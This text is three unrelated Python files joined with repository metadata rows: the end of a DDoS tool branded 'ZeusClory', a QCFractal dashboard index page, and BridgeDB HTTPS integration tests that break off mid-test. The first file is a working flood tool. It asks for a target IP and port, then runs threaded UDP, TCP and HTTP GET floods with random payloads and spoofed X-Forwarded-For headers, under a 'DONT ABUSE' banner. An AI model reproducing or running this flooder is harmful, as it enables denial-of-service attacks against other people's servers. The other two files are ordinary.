'Mozilla/5.0 (X11; U; Linux; i686; en-US; rv:1.6) Gecko Epiphany/1.2.8',
'Mozilla/5.0 (X11; U; Linux; i686; en-US; rv:1.6) Gecko Galeon/1.3.14',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7 MG(Novarra-Vision/6.9)',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.16) Gecko/20080716 (Gentoo) Galeon/2.0.6',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1) Gecko/20061024 Firefox/2.0 (Swiftfox)',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.11) Gecko/2009060309 Ubuntu/9.10 (karmic) Firefox/3.0.11',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.8) Gecko Galeon/2.0.6 (Ubuntu 2.0.6-2)',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.16) Gecko/20120421 Gecko Firefox/11.0',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.2) Gecko/20090803 Ubuntu/9.04 (jaunty) Shiretoko/3.5.2',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9a3pre) Gecko/20070330',
'Mozilla/5.0 (X11; U; Linux i686; it; rv:1.9.2.3) Gecko/20100406 Firefox/3.6.3 (Swiftfox)',
'Mozilla/5.0 (X11; U; Linux i686; pl-PL; rv:1.9.0.2) Gecko/20121223 Ubuntu/9.25 (jaunty) Firefox/3.8',
'Mozilla/5.0 (X11; U; Linux i686; pt-PT; rv:1.9.2.3) Gecko/20100402 Iceweasel/3.6.3 (like Firefox/3.6.3) GTB7.0',
'Mozilla/5.0 (X11; U; Linux ppc; en-US; rv:1.8.1.13) Gecko/20080313 Iceape/1.1.9 (Debian-1.1.9-5)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/532.9 (KHTML, like Gecko) Chrome/5.0.309.0 Safari/532.9',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.15 (KHTML, like Gecko) Chrome/10.0.613.0 Safari/534.15',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.514.0 Safari/534.7',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/540.0 (KHTML, like Gecko) Ubuntu/10.10 Chrome/9.1.0.0 Safari/540.0',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.3) Gecko/2008092814 (Debian-3.0.1-1)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.13) Gecko/20100916 Iceape/2.0.8',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.17) Gecko/20110123 SeaMonkey/2.0.12',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20091020 Linux Mint/8 (Helena) Firefox/3.5.3',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.5) Gecko/20091107 Firefox/3.5.5',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.9) Gecko/20100915 Gentoo Firefox/3.6.9',
'Mozilla/5.0 (X11; U; Linux x86_64; sv-SE; rv:1.8.1.12) Gecko/20080207 Ubuntu/7.10 (gutsy) Firefox/2.0.0.12',
'Mozilla/5.0 (X11; U; Linux x86_64; us; rv:1.9.1.19) Gecko/20110430 shadowfox/7.0 (like Firefox/7.0',
'Mozilla/5.0 (X11; U; NetBSD amd64; en-US; rv:1.9.2.15) Gecko/20110308 Namoroka/3.6.15',
'Mozilla/5.0 (X11; U; OpenBSD arm; en-us) AppleWebKit/531.2 (KHTML, like Gecko) Safari/531.2 Epiphany/2.30.0',
'Mozilla/5.0 (X11; U; OpenBSD i386; en-US) AppleWebKit/533.3 (KHTML, like Gecko) Chrome/5.0.359.0 Safari/533.3',
'Mozilla/5.0 (X11; U; OpenBSD i386; en-US; rv:1.9.1) Gecko/20090702 Firefox/3.5',
'Mozilla/5.0 (X11; U; SunOS i86pc; en-US; rv:1.8.1.12) Gecko/20080303 SeaMonkey/1.1.8',
'Mozilla/5.0 (X11; U; SunOS i86pc; en-US; rv:1.9.1b3) Gecko/20090429 Firefox/3.1b3',
'Mozilla/5.0 (X11; U; SunOS sun4m; en-US; rv:1.4b) Gecko/20030517 Mozilla Firebird/0.6',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/532.9 (KHTML, like Gecko) Chrome/5.0.309.0 Safari/532.9',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.15 (KHTML, like Gecko) Chrome/10.0.613.0 Safari/534.15',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.514.0 Safari/534.7',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/540.0 (KHTML, like Gecko) Ubuntu/10.10 Chrome/9.1.0.0 Safari/540.0',
'Mozilla/5.0 (Linux; Android 7.1.1; MI 6 Build/NMF26X; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/57.0.2987.132 MQQBrowser/6.2 TBS/043807 Mobile Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/WIFI Language/zh_CN',
'Mozilla/5.0 (Linux; Android 7.1.1; OD103 Build/NMF26F; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043632 Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/4G Language/zh_CN',
'Mozilla/5.0 (Linux; Android 6.0.1; SM919 Build/MXB48T; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043632 Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/WIFI Language/zh_CN',
'Mozilla/5.0 (Linux; Android 5.1.1; vivo X6S A Build/LMY47V; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043632 Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/WIFI Language/zh_CN',
'Mozilla/5.0 (Linux; Android 5.1; HUAWEI TAG-AL00 Build/HUAWEITAG-AL00; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043622 Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/4G Language/zh_CN',
'Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_2 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Mobile/13F69 MicroMessenger/6.6.1 NetType/4G Language/zh_CN',
'Mozilla/5.0 (iPhone; CPU iPhone OS 11_2_2 like Mac https://m.baidu.com/mip/c/s/zhangzifan.com/wechat-user-agent.htmlOS X) AppleWebKit/604.4.7 (KHTML, like Gecko) Mobile/15C202 MicroMessenger/6.6.1 NetType/4G Language/zh_CN',
'Mozilla/5.0 (iPhone; CPU iPhone OS 11_1_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Mobile/15B150 MicroMessenger/6.6.1 NetType/WIFI Language/zh_CN',
'Mozilla/5.0 (iphone x Build/MXB48T; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043632 Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/WIFI Language/zh_CN']
acceptall = [
'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\n',
'Accept-Encoding: gzip, deflate\r\n',
'Accept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\n',
'Accept: text/html, application/xhtml+xml, application/xml;q=0.9, */*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Charset: iso-8859-1\r\nAccept-Encoding: gzip\r\n',
'Accept: application/xml,application/xhtml+xml,text/html;q=0.9, text/plain;q=0.8,image/png,*/*;q=0.5\r\nAccept-Charset: iso-8859-1\r\n',
'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Encoding: br;q=1.0, gzip;q=0.8, *;q=0.1\r\nAccept-Language: utf-8, iso-8859-1;q=0.5, *;q=0.1\r\nAccept-Charset: utf-8, iso-8859-1;q=0.5\r\n',
'Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, application/x-shockwave-flash, application/msword, */*\r\nAccept-Language: en-US,en;q=0.5\r\n',
'Accept: text/html, application/xhtml+xml, image/jxr, */*\r\nAccept-Encoding: gzip\r\nAccept-Charset: utf-8, iso-8859-1;q=0.5\r\nAccept-Language: utf-8, iso-8859-1;q=0.5, *;q=0.1\r\n',
'Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/webp, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Encoding: gzip\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Charset: utf-8, iso-8859-1;q=0.5\r\n,Accept: text/html, application/xhtml+xml, application/xml;q=0.9, */*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\n',
'Accept-Charset: utf-8, iso-8859-1;q=0.5\r\nAccept-Language: utf-8, iso-8859-1;q=0.5, *;q=0.1\r\n',
'Accept: text/html, application/xhtml+xml',
'Accept-Language: en-US,en;q=0.5\r\n',
'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Encoding: br;q=1.0, gzip;q=0.8, *;q=0.1\r\n',
'Accept: text/plain;q=0.8,image/png,*/*;q=0.5\r\nAccept-Charset: iso-8859-1\r\n']
referers = [
'Your_Server_Bypassed_By_Zeus',
'Your_Server_Bypassed_By_Zeus',
'Your_Server_Bypassed_By_Zeus',
'Your_Server_Bypassed_By_Zeus',
'Your_Server_Bypassed_By_Zeus',
'Your_Server_Bypassed_By_Zeus',
'Your_Server_Bypassed_By_Zeus',
'Your_Server_Bypassed_By_Zeus',
'Your_Server_Bypassed_By_Zeus',
'Your_Server_Bypassed_By_Zeus',
'Your_Server_Bypassed_By_Zeus',
'Your_Server_Bypassed_By_Zeus',
'Your_Server_Bypassed_By_Zeus',
'Your_Server_Bypassed_By_Zeus',
'Your_Server_Bypassed_By_Zeus',
'Your_Server_Bypassed_By_Zeus',
'Your_Server_Bypassed_By_Zeus',
'Your_Server_Bypassed_By_Zeus',
'Your_Server_Bypassed_By_Zeus',
'Your_Server_Bypassed_By_Zeus', ]
print("""TUNGGU ZEUS CLORY OPEN KEY""")
time.sleep(5)
os.system("clear")
print("\033[95m")
print("""
ZeusCloryUs-Attack
""")
print("""\033[91m
||DONT ABUSE BRO ||
#==========================================#
| Follow My Sosmedia!!!! |
| AUTHOR : ZeusClory#3399 |
| github : https://github.com/ZeusClory |
| youtube : https://youtube.com/ZeusClory|
#===========================================#""")
print("\033[92m")
print("""
██╗░░██╗██████╗░██╗░░░██╗██╗░░░██╗██╗░░░██╗
╚██╗██╔╝██╔══██╗╚██╗░██╔╝██║░░░██║██║░░░██║
░╚███╔╝░██████╔╝░╚████╔╝░██║░░░██║██║░░░██║
░██╔██╗░██╔══██╗░░╚██╔╝░░██║░░░██║██║░░░██║
██╔╝╚██╗██║░░██║░░░██║░░░╚██████╔╝╚██████╔╝
╚═╝░░╚═╝╚═╝░░╚═╝░░░╚═╝░░░░╚═════╝░░╚═════╝░
██████╗░██████╗░░█████╗░░██████╗
██╔══██╗██╔══██╗██╔══██╗██╔════╝
██║░░██║██║░░██║██║░░██║╚█████╗░
██║░░██║██║░░██║██║░░██║░╚═══██╗
██████╔╝██████╔╝╚█████╔╝██████╔╝
╚═════╝░╚═════╝░░╚════╝░╚═════╝░
""")
print("\033[95m")
print("""
•Режимы атаки|•
| UDP | TCP | GET |""")
print("\033[92m")
ip = str(input("[ ====> ] IP/HOST цели : "))
port = int(input("[ ====> ] Порт цели : "))
choice = str(input("[ ====> ] Метод (Get/TCP/UDP) : "))
times = int(input("[ ====> ] Ко-во пакетов : "))
threads = int(input("[ ====> ] Сколько потоков : "))
def udp():
data = random._urandom(800)
while True:
try:
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
addr = (str(ip), int(port))
for x in range(times):
s.sendto(data, addr)
print(+"\033[0;37;50m ATTACK IP %s \033[95mAND PORT %s WITH UDP" % (ip, port))
except:
print("\033[0;37;95m Zeus-Clory Attack IP %s \033[92m And Port %s" % (ip, port))
def tcp():
data = random._urandom(102489)
while True:
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((ip, port))
s.send(data)
for x in range(times):
s.send(data)
except:
s.close()
print("\033[1;31;95m ATTACK IP %s AND PORT %s WITH METHOD TCP" % (ip, port))
def spoofer():
addr = [192, 168, 0, 1]
d = '.'
addr[0] = str(random.randrange(11, 197))
addr[1] = str(random.randrange(0, 255))
addr[2] = str(random.randrange(0, 255))
addr[3] = str(random.randrange(2, 254))
assemebled = addr[0] + d + addr[1] + d + addr[2] + d + addr[3]
return assemebled
def Headers(method):
header = ""
if method == "get" or method == "head":
post_host = "POST /Your_Server_Bypassed_By_ZeusClory HTTP/1.1\r\nHost: " + ip + "\r\n"
connection = "Connection: Keep-Alive\r\n"
accept = random.choice(acceptall) + "\r\n"
content = "Content-Type: application/x-www-form-urlencoded\r\nX-Requested-With: XMLHttpRequest\r\n charset=utf-8\r\n"
referer = "Referer: " + random.choice(referers) + ip + "\r\n"
connection += "Cache-Control: max-age=0\r\n"
connection += "pragma: no-cache\r\n"
connection += "X-Forwarded-For: " + spoofer() + "\r\n"
randomip = str(random.randint(1, 255)) + "." + str(random.randint(0, 255)) + "." + str(random.randint(0, 255)) + "." + str(random.randint(0, 255))
forward = "X-Forwarded-For: 1\r\n"
forward += "Client-IP: 10000\r\n"
length = "Content-Length: 0 \r\nConnection: Keep-Alive\r\n"
useragent = "User-Agent: " + random.choice(useragents) + "\r\n"
header = post_host + referer + forward + useragent + accept + content + connection + length + "\r\n\r\n"
return header
os.system('color ' + random.choice(['D']) + " & cls & title ZeusClory [Ddos]")
def get():
header = Headers("get")
i = random.choice(("[*]", "[!]", "[#]"))
data = random._urandom(10299)
if choice == "1":
get_host = "GET /Your_Server_Bypassed_By_ZeusClory HTTP/1.1\r\nHost: " + ip + "\r\n"
request = get_host + header + "\r\n"
else:
get_host = random.choice(
['GET', 'POST', 'HEAD']) + " /Your_Server_Bypassed_By_ZeusCloey HTTP/1.1\r\nHost: " + ip + "\r\n"
request = get_host + header + "\r\n"
while True:
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
s.connect((ip, port))
s.send(data)
s.send(data)
s.send(data)
s.send(data)
s.sendall(str.encode(request))
s.sendall(str.encode(request))
s.sendall(str.encode(request))
s.sendall(str.encode(request))
s.send(data)
s.send(data)
s.send(data)
s.send(data)
s.sendall(str.encode(request))
s.sendall(str.encode(request))
s.sendall(str.encode(request))
s.sendall(str.encode(request))
s.send(data)
s.send(data)
s.send(data)
s.send(data)
s.sendall(str.encode(request))
s.sendall(str.encode(request))
s.sendall(str.encode(request))
s.sendall(str.encode(request))
s.send(data)
s.send(data)
s.send(data)
s.send(data)
s.sendall(str.encode(request))
s.sendall(str.encode(request))
s.sendall(str.encode(request))
s.sendall(str.encode(request))
for x in range(time):
s.send(data)
s.send(data)
s.send(data)
s.send(data)
s.sendall(str.encode(request))
s.sendall(str.encode(request))
s.sendall(str.encode(request))
s.sendall(str.encode(request))
s.send(data)
s.send(data)
s.send(data)
s.send(data)
s.sendall(str.encode(request))
s.sendall(str.encode(request))
s.sendall(str.encode(request))
s.sendall(str.encode(request))
s.send(data)
s.send(data)
s.send(data)
s.send(data)
s.sendall(str.encode(request))
s.sendall(str.encode(request))
s.sendall(str.encode(request))
s.sendall(str.encode(request))
print("\033[1;36;40m ATTACK IP %s ANF PORT %s" % (ip, port))
except socket.error:
s.close()
print("\033[1;36;40m ATTACK IP %s AND PORT %s" % (ip, port))
def start_zeus():
for y in range(threads):
if choice == 'UDP':
th = threading.Thread(target=udp)
th.start()
elif choice == 'TCP':
th = threading.Thread(target=tcp)
th.start()
elif choice == 'GET':
th = threading.Thread(target=get)
th.start() | 66.281081 | 366 | 0.612176 |
002431a429892ecd738e8089d6e1c677635924fe | 1,392 | py | Python | qcfractal/dashboard/index.py | yudongqiu/QCFractal | 43b5b4807dfe19f78177288f204aab1066de2dea | [
"BSD-3-Clause"
] | null | null | null | qcfractal/dashboard/index.py | yudongqiu/QCFractal | 43b5b4807dfe19f78177288f204aab1066de2dea | [
"BSD-3-Clause"
] | null | null | null | qcfractal/dashboard/index.py | yudongqiu/QCFractal | 43b5b4807dfe19f78177288f204aab1066de2dea | [
"BSD-3-Clause"
] | null | null | null | import dash_core_components as dcc
import dash_html_components as html
import dash_bootstrap_components as dbc
from dash.dependencies import Input, Output
from .app import app
from .navbar import navbar
from . import dash_managers
from . import dash_queue
from . import dash_service
# Static landing-page layout: a two-column Bootstrap row with an overview
# blurb on the left and a placeholder Plotly graph on the right.
body = dbc.Container(
    [
        dbc.Row([
            dbc.Col(
                [
                    html.H2("Overview"),
                    html.P("""\
Welcome to the QCFractal Dashboard which will give a high
level overview of the current state of the database.
"""),
                    dbc.Button("View details", color="secondary"),
                ],
                md=4,  # left column occupies 4 of the 12 grid units
            ),
            dbc.Col([
                html.H2("Graph"),
                dcc.Graph(figure={"data": [{
                    "x": [1, 2, 3],
                    "y": [1, 4, 9]
                }]}),
            ]),
        ])
    ],
    className="mt-4",
)
# Top-level app layout: dcc.Location tracks the browser URL so the
# display_page callback below can route each path to its page layout.
app.layout = html.Div([dcc.Location(id='url', refresh=False), html.Div(id='page-content')])
@app.callback(Output('page-content', 'children'), [Input('url', 'pathname')])
def display_page(pathname):
    """Route the requested URL path to the matching page layout.

    Any path without a dedicated page falls back to the home page
    (navbar plus the overview body).
    """
    routes = {
        '/manager': dash_managers.layout,
        '/queue': dash_queue.layout,
        '/service': dash_service.layout,
    }
    page_layout = routes.get(pathname)
    if page_layout is not None:
        return page_layout()
    return html.Div([navbar, body])
8432c2029ef5376b83d52ba91169b9459550664b | 15,663 | py | Python | bridgedb/test/test_https.py | emmapeel2/bridgedb | c91498a3287be9717e6a1203e60b9503ad537de8 | [
"BSD-3-Clause-Clear"
] | 4 | 2016-04-18T06:30:54.000Z | 2019-07-17T14:02:45.000Z | bridgedb/test/test_https.py | emmapeel2/bridgedb | c91498a3287be9717e6a1203e60b9503ad537de8 | [
"BSD-3-Clause-Clear"
] | null | null | null | bridgedb/test/test_https.py | emmapeel2/bridgedb | c91498a3287be9717e6a1203e60b9503ad537de8 | [
"BSD-3-Clause-Clear"
] | 1 | 2019-04-11T23:00:02.000Z | 2019-04-11T23:00:02.000Z | # -*- coding: utf-8 -*-
#_____________________________________________________________________________
#
# This file is part of BridgeDB, a Tor bridge distribution system.
#
# :authors: trygve <tor-dev@lists.torproject.org>
# :copyright: (c) 2014, trygve
# (c) 2014-2017, The Tor Project, Inc.
# (c) 2014-2017, Isis Lovecruft
# :license: see LICENSE for licensing information
#_____________________________________________________________________________
"""Integration tests for BridgeDB's HTTPS Distributor.
These tests use `mechanize`_ and `BeautifulSoup`_, and require a BridgeDB
instance to have been started in a separate process. To see how a BridgeDB is
started for our CI infrastructure from a fresh clone of this repository, see
the "before_script" section of the `.travis.yml` file in the top level of this
repository.
.. _mechanize: https://pypi.python.org/pypi/mechanize/
http://wwwsearch.sourceforge.net/mechanize/
.. _BeautifulSoup:
http://www.crummy.com/software/BeautifulSoup/bs3/documentation.html
"""
from __future__ import print_function
import gettext
import ipaddr
import mechanize
import os
from BeautifulSoup import BeautifulSoup
from twisted.trial import unittest
from twisted.trial.reporter import TestResult
from twisted.trial.unittest import FailTest
from twisted.trial.unittest import SkipTest
from bridgedb.test.test_Tests import DynamicTestCaseMeta
from bridgedb.test.util import processExists
from bridgedb.test.util import getBridgeDBPID
# Address of the plaintext HTTP BridgeDB instance under test.
HTTP_ROOT = 'http://127.0.0.1:6788'
# The single CAPTCHA answer configured for the test deployment.
CAPTCHA_RESPONSE = 'Tvx74Pmy'
# Walk upward from the CWD to locate the repository root.
# NOTE(review): this loops forever if no ancestor directory name ends in
# 'bridgedb' -- assumes tests are always run from inside the repo; confirm.
TOPDIR = os.getcwd()
while not TOPDIR.endswith('bridgedb'):
    TOPDIR = os.path.dirname(TOPDIR)
# PID of the separately-started BridgeDB process, read from its pidfile.
PIDFILE = os.path.join(TOPDIR, 'run', 'bridgedb.pid')
PID = getBridgeDBPID(PIDFILE)
class HTTPTests(unittest.TestCase):
    def setUp(self):
        # Mechanize cannot validate the self-signed TLS certificate used by
        # the test BridgeDB, so these tests need the plaintext HTTP port
        # that is only opened on CI deployments; skip everywhere else.
        if not os.environ.get("CI"):
            raise SkipTest(("The mechanize tests cannot handle self-signed "
                            "TLS certificates, and thus require opening "
                            "another port for running a plaintext HTTP-only "
                            "BridgeDB webserver. Because of this, these tests "
                            "are only run on CI servers."))
        # Fail hard (not skip) if the BridgeDB process never came up.
        if not PID or not processExists(PID):
            raise FailTest("Could not start BridgeDB process on CI server!")
        # Browser is created lazily by openBrowser() in each test.
        self.br = None
    def tearDown(self):
        # Drop the browser reference so each test starts from a clean state.
        self.br = None
    def openBrowser(self):
        """Open the BridgeDB home page in a fresh mechanize browser.

        :rtype: ``mechanize.Browser``
        :returns: The browser, positioned on the BridgeDB root page.
        """
        # use mechanize to open the BridgeDB website in its browser
        self.br = mechanize.Browser()
        # prevents 'HTTP Error 403: request disallowed by robots.txt'
        self.br.set_handle_robots(False)
        self.br.open(HTTP_ROOT)
        # -------------- Home/Root page
        # Sanity-check that we actually landed on the BridgeDB index.
        self.assertTrue(self.br.viewing_html())
        self.assertEquals(self.br.response().geturl(), HTTP_ROOT)
        self.assertEquals(self.br.title(), "BridgeDB")
        return self.br
    def goToOptionsPage(self):
        """Follow the 'bridges' link from the root page to /options.

        :rtype: ``mechanize.Browser``
        :returns: The browser, positioned on the options page.
        """
        # check that we are on the root page
        self.assertTrue(self.br.viewing_html())
        self.assertEquals(self.br.response().geturl(), HTTP_ROOT)
        # follow the link with the word 'bridges' in it.
        # Could also use: text='bridges'
        # Could also use: url='/options'
        self.br.follow_link(text_regex='bridges')
        # ------------- Options
        self.assertEquals(self.br.response().geturl(), HTTP_ROOT + "/options")
        return self.br
    def submitOptions(self, transport, ipv6, captchaResponse):
        """Fill in and submit the options form, then solve the CAPTCHA.

        :param str transport: The pluggable transport to request ('0' for
            vanilla bridges).
        :param bool ipv6: If True, request IPv6 bridges.
        :param str captchaResponse: The CAPTCHA solution to submit.
        :returns: A ``BeautifulSoup`` of the resulting bridges page.
        """
        # check that we are on the options page
        self.assertEquals(self.br.response().geturl(), HTTP_ROOT + "/options")
        # At this point, we'd like to be able to set some values in
        # the 'advancedOptions' form. Unfortunately the HTML form
        # does not define a 'name' attribute, so the we have to rely on
        # the fact that this is the only form on the page and will therefore
        # always exist at index 0.
        #br.select_form(name="advancedOptions")
        self.br.select_form(nr=0)
        # change the pluggable transport to something else
        self.br.form['transport'] = [transport]
        if ipv6:
            self.br.form['ipv6'] = ['yes']
        self.br.submit()
        # ------------- Captcha
        # The query string must reflect the options we just submitted.
        EXPECTED_URL = HTTP_ROOT + "/bridges?transport=%s" % transport
        if ipv6:
            EXPECTED_URL += "&ipv6=yes"
        self.assertEquals(self.br.response().geturl(), EXPECTED_URL)
        # As on the previous page, the form does not define a 'name'
        # attribute, forcing us to use the index of the form, i.e. 0
        #self.br.select_form(name="captchaSubmission")
        self.br.select_form(nr=0)
        # input the required captcha response. There is only one captcha
        # defined by default, so this should always be accepted. Note this
        # will not be possible to automate if used with a third-party CAPTCHA
        # systems (e.g. reCAPTCHA)
        self.br.form['captcha_response_field'] = captchaResponse
        captcha_response = self.br.submit()
        # ------------- Results
        # URL should be the same as last time
        self.assertEquals(self.br.response().geturl(), EXPECTED_URL)
        soup = BeautifulSoup(captcha_response.read())
        return soup
def getBridgeLinesFromSoup(self, soup, fieldsPerBridge):
"""We're looking for something like this in the response::
<div class="bridge-lines">
obfs2 175.213.252.207:11125 5c6da7d927460317c6ff5420b75c2d0f431f18dd
</div>
"""
bridges = []
soup = soup.findAll(attrs={'class' : 'bridge-lines'})
self.assertTrue(soup, "Could not find <div class='bridge-lines'>!")
for portion in soup:
br_tags = portion.findChildren('br')
bridge_lines = set(portion.contents).difference(set(br_tags))
for bridge_line in bridge_lines:
bridge_line = bridge_line.strip()
if bridge_line:
fields = bridge_line.split()
bridges.append(fields)
self.assertTrue(len(bridges) > 0, "Found no bridge lines in %s" % soup)
for bridge in bridges:
self.assertEquals(len(bridge), fieldsPerBridge,
"Expected %d fields in bridge line %s"
% (fieldsPerBridge, bridge))
return bridges
    def test_content_security_policy(self):
        """Check that the HTTP Content-Security-Policy header is set."""
        self.br = mechanize.Browser()
        self.br.set_handle_robots(False)
        self.br.set_debug_http(True)
        self.br.open(HTTP_ROOT)
        # Flatten all response headers into one string for substring checks.
        headers = ''.join(self.br.response().info().headers)
        self.assertIn("Content-Security-Policy", headers)
        # A default-src of 'none' means every resource type must be
        # explicitly whitelisted by another CSP directive.
        self.assertIn("default-src 'none';", headers)
    def test_404(self):
        """Asking for a non-existent resource should yield our custom 404 page,
        but we can't actually check because Mechanize flips out if we get
        anything response code other than 200. :/
        """
        # Any unknown path should produce an HTTP 404, which mechanize
        # surfaces as an HTTPError.
        page = '/'.join([HTTP_ROOT, '404'])
        self.openBrowser()
        self.assertRaises(mechanize.HTTPError, self.br.open, page)
def test_get_obfs3_ipv4(self):
self.openBrowser()
self.goToOptionsPage()
PT = 'obfs3'
soup = self.submitOptions(transport=PT, ipv6=False,
captchaResponse=CAPTCHA_RESPONSE)
bridges = self.getBridgeLinesFromSoup(soup, fieldsPerBridge=3)
for bridge in bridges:
pt = bridge[0]
self.assertEquals(PT, pt)
def test_get_vanilla_ipv4(self):
self.openBrowser()
self.goToOptionsPage()
PT = '0'
soup = self.submitOptions(transport=PT, ipv6=False,
captchaResponse=CAPTCHA_RESPONSE)
bridges = self.getBridgeLinesFromSoup(soup, fieldsPerBridge=2)
for bridge in bridges:
self.assertTrue(bridge != None)
addr = bridge[0].rsplit(':', 1)[0]
self.assertIsInstance(ipaddr.IPAddress(addr), ipaddr.IPv4Address)
def test_get_vanilla_ipv6(self):
self.openBrowser()
self.goToOptionsPage()
PT = '0'
soup = self.submitOptions(transport=PT, ipv6=True,
captchaResponse=CAPTCHA_RESPONSE)
bridges = self.getBridgeLinesFromSoup(soup, fieldsPerBridge=2)
for bridge in bridges:
self.assertTrue(bridge != None)
addr = bridge[0].rsplit(':', 1)[0].strip('[]')
self.assertIsInstance(ipaddr.IPAddress(addr), ipaddr.IPv6Address)
def test_get_scramblesuit_ipv4(self):
self.openBrowser()
self.goToOptionsPage()
PT = 'scramblesuit'
soup = self.submitOptions(transport=PT, ipv6=False,
captchaResponse=CAPTCHA_RESPONSE)
bridges = self.getBridgeLinesFromSoup(soup, fieldsPerBridge=4)
for bridge in bridges:
pt = bridge[0]
password = bridge[-1]
self.assertEquals(PT, pt)
self.assertTrue(password.find("password=") != -1,
"Password field missing expected text")
def test_get_obfs4_ipv4(self):
"""Try asking for obfs4 bridges, and check that the PT arguments in the
returned bridge lines were space-separated.
This is a regression test for #12932, see
https://bugs.torproject.org/12932.
"""
self.openBrowser()
self.goToOptionsPage()
PT = 'obfs4'
try:
soup = self.submitOptions(transport=PT, ipv6=False,
captchaResponse=CAPTCHA_RESPONSE)
except ValueError as error:
if 'non-disabled' in str(error):
raise SkipTest("Pluggable Transport obfs4 is currently disabled.")
bridges = self.getBridgeLinesFromSoup(soup, fieldsPerBridge=6)
for bridge in bridges:
pt = bridge[0]
ptArgs = bridge[-3:]
self.assertEquals(PT, pt)
self.assertTrue(len(ptArgs) == 3,
("Expected obfs4 bridge line to have 3 PT args, "
"found %d instead: %s") % (len(ptArgs), ptArgs))
def test_get_obfs4_ipv4_iatmode(self):
"""Ask for obfs4 bridges and check that there is an 'iat-mode' PT
argument in the bridge lines.
"""
self.openBrowser()
self.goToOptionsPage()
PT = 'obfs4'
try:
soup = self.submitOptions(transport=PT, ipv6=False,
captchaResponse=CAPTCHA_RESPONSE)
except ValueError as error:
if 'non-disabled' in str(error):
raise SkipTest("Pluggable Transport obfs4 is currently disabled.")
bridges = self.getBridgeLinesFromSoup(soup, fieldsPerBridge=6)
for bridge in bridges:
ptArgs = bridge[-3:]
hasIATMode = False
for arg in ptArgs:
if 'iat-mode' in arg:
hasIATMode = True
self.assertTrue(hasIATMode,
"obfs4 bridge line is missing 'iat-mode' PT arg.")
def test_get_obfs4_ipv4_publickey(self):
"""Ask for obfs4 bridges and check that there is an 'public-key' PT
argument in the bridge lines.
"""
self.openBrowser()
self.goToOptionsPage()
PT = 'obfs4'
try:
soup = self.submitOptions(transport=PT, ipv6=False,
captchaResponse=CAPTCHA_RESPONSE)
except ValueError as error:
if 'non-disabled' in str(error):
raise SkipTest("Pluggable Transport obfs4 is currently disabled.")
bridges = self.getBridgeLinesFromSoup(soup, fieldsPerBridge=6)
for bridge in bridges:
ptArgs = bridge[-3:]
hasPublicKey = False
for arg in ptArgs:
if 'public-key' in arg:
hasPublicKey = True
